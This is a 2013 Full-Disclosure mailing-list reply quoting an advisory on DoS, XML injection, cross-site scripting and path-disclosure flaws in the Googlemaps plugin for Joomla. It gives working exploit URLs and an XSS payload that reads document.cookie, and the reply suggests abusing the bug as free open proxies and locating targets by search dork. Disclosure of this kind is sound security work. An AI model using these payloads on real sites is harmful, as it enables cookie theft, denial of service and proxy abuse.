[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <CAH72vigkKuR+49=Yqa_btzA8T=X57Z-ZY3v9oTNhHTXQWFZC8w@mail.gmail.com>
Date: Thu, 18 Jul 2013 14:28:41 +0200
From: Źmicier Januszkiewicz <gauri@....by>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Re: Multiple vulnerabilities in Googlemaps plugin
for Joomla
Ah, and as a side effect, you get a bunch of free HTTP proxies -- the
script will fetch and print anything. Just to fix up the content type, but
this should not be an issue.
Finally, something useful.
I leave the google dork as an exercise for the reader.
Cheers,
Z.
2013/7/16 MustLive <mustlive@...security.com.ua>
> Hello list!
>
> These are Denial of Service, XML Injection, Cross-Site Scripting and Full
> path disclosure vulnerabilities in Googlemaps plugin for Joomla.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and
> potentially previous versions. In new version of DAVOSET I'll add a lot of
> web sites with Googlemaps plugin.
>
> -------------------------
> Affected vendors:
> -------------------------
>
> Mike Reumer
> http://extensions.joomla.org/**extensions/maps-a-weather/**
> maps-a-locations/maps/1147<http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147>
>
> ----------
> Details:
> ----------
>
> Denial of Service (WASC-10):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php?**
> url=site2/large_file<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file>
>
> Besides conducting DoS attack manually, it's also possible to conduct
> automated DoS and DDoS attacks with using of DAVOSET (
> http://lists.webappsec.org/**pipermail/websecurity_lists.**
> webappsec.org/2013-June/**008850.html<http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html>
> ).
>
> XML Injection (WASC-23):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php?**
> url=site2/xml.xml<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml>
>
> It's possible to include external xml-files. Which also can be used for
> XSS attack:
>
> XSS via XML Injection (WASC-23):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php?**
> url=site2/xss.xml<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml>
>
> File xss.xml:
>
> <?xml version="1.0" encoding="utf-8"?>
> <feed>
> <title>XSS</title>
> <entry>
> <div xmlns="http://www.w3.org/1999/**xhtml <http://www.w3.org/1999/xhtml>
> "><script>alert(document.**cookie)</script></div>
> </entry>
> </feed>
>
> Cross-Site Scripting (WASC-08):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php?**
> url=%3Cbody%20onload=alert(**document.cookie)%3E<http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E>
>
> Full path disclosure (WASC-13):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php<http://site/plugins/content/plugin_googlemap2_proxy.php>
>
> Besides plugin_googlemap2_proxy.php, also happens
> plugin_googlemap3_proxy.php (but it has other path at web sites).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> ______________________________**_________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-**disclosure-charter.html<http://lists.grok.org.uk/full-disclosure-charter.html>
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists